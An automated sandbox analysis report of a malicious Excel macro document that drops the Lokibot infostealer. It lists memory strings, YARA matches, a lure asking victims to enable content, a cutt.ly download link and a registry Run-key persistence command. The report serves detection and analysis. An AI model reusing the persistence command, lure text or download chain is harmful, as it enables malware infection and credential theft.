                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.chambersign.org1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
                Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
                Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmpString found in binary or memory: http://www.entrust.net/CRL/net1.crl0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: http://www.firmaprofesional.com0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.globaltrust.info0=
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: RegAsm.exeString found in binary or memory: http://www.ibsensoftware.com/
                Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pki.gva.es/cps0%
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadis.bm0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                Source: powershell.exe, 00000006.00000002.2106986804.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
                Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/current.crl0
                Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmpString found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/cps/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.sk.ee/juur/crl/0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                Source: powershell.exe, 00000006.00000003.2094858856.000000001D2AE000.00000004.00000001.sdmpString found in binary or memory: http://www.trustcenter.de/guidelines0
                Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmpString found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: http://www.valicert.com/1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: http://www.wellsfargo.com/certpolicy0
                Source: 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/
                Source: powershell.exe, 00000006.00000002.2098023844.00000000001D0000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2099196904.0000000002BD1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2099216608.0000000002BFF000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/qjdJoz4
                Source: powershell.exe, 00000006.00000002.2101898032.0000000003566000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/qjdJoz4PE
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
                Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Document image extraction number: 0Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
                Source: Document image extraction number: 0Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
                Source: Document image extraction number: 0Screenshot OCR: Enable Content"
                Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
                Source: Document image extraction number: 1Screenshot OCR: document is protected! To view this content, please click "Enable Editing" from the yellow bar and
                Source: Document image extraction number: 1Screenshot OCR: Enable Content"
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: 6Cprm97UTl.xlsInitial sample: EXEC
                Found abnormal large hidden Excel 4.0 Macro sheetShow sources
                Source: 6Cprm97UTl.xlsInitial sample: Sheet size: 5194
                Found obfuscated Excel 4.0 MacroShow sources
                Source: 6Cprm97UTl.xlsInitial sample: High usage of CHAR() function: 16
                Powershell drops PE fileShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\12.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\12.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\reg.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D5BC0 CreateProcessAsUserW,
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003130D1
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318D20
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003169B0
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318240
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00314EF1
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031D3B8
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_003197C2
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00313BC9
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_00318D10
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031DEC8
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031D3A8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005030D1
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050D090
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005069B0
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050EBD0
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00503BC9
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508D20
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508520
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050F5B8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00504EF1
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005097C2
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_0050D080
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00508D10
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D24E8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D2C18
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D0A28
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D4A20
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D7312
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D5490
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D24D8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D0A18
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D2C08
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D3D80
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D61C8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D41F8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D41E8
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_009D7F40
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_004930D1
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_004969B0
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_00494EF1
                Source: C:\Users\user\ntrwe.exeCode function: 16_2_00493BC9
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00253DFE
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040549C
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_004029D4
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004030D1
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040D090
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004069B0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00403BC9
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408515
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408D20
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00404EF1
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_004097C2
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040D080
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_0040DBA0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00408D10
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D40048
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43818
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D45DA0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D41D58
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D48640
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D40A30
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43F48
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D474F8
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D450B0
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D40006
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43808
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D46838
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D41D49
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D45517
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D45528
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D49270
                Source: C:\Users\user\ntrwe.exeCode function: 18_2_00D43F39
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 19_2_01233DFE
                Source: 6Cprm97UTl.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RegAsm.exe 5FF87E563B2DF09E94E17C82741D9A43AED2F214643DC067232916FAE4B35417
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
